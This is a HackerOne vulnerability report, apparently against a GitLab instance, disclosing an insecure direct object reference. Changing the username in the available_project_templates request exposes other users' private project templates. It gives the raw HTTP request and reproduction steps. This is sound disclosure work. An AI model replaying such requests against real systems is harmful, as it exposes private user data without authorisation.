IDOR in getting project template lists of other users
HackerOne report #750636 by ashish_r_padelkar on 2019-12-03, assigned to @dcouture:
Summary
Hello,
When you create a project using template, there is a tab Instance
When you click on it, it send the request like below
GET /users/guest1/available_project_templates HTTP/1.1
Host: mygitserver.in
Accept: */*
X-CSRF-Token: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Referer: http://mygitserver.in/projects/new
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie:1
Connection: close
and you will see the list of project template available for yourself.
Using this request, you can also see the available templates for other users too (private) by just changing the username in the request.
GET /users/<Change The UserName>/available_project_templates HTTP/1.1
Steps to reproduce
- Go to create project using
Create from Templateoption - Click on
Instancetab and capture the request shown above. - Just change the username of admin in the instance for eg
GET /users/<Change The UserName>/available_project_templates HTTP/1.1 - The response will show you all available templates for admin despite you dont have permission to see any of it.
What is the current bug behavior?
Shows available project templates of other users
What is the expected correct behavior?
Only project template belongs to you should be displayed
Output of checks
Tested on 12.5.2-ee
Regards,
Ashish
Impact
Users able to see project templates of other users IDOR
Attachments
Warning: Attachments received through HackerOne, please exercise caution!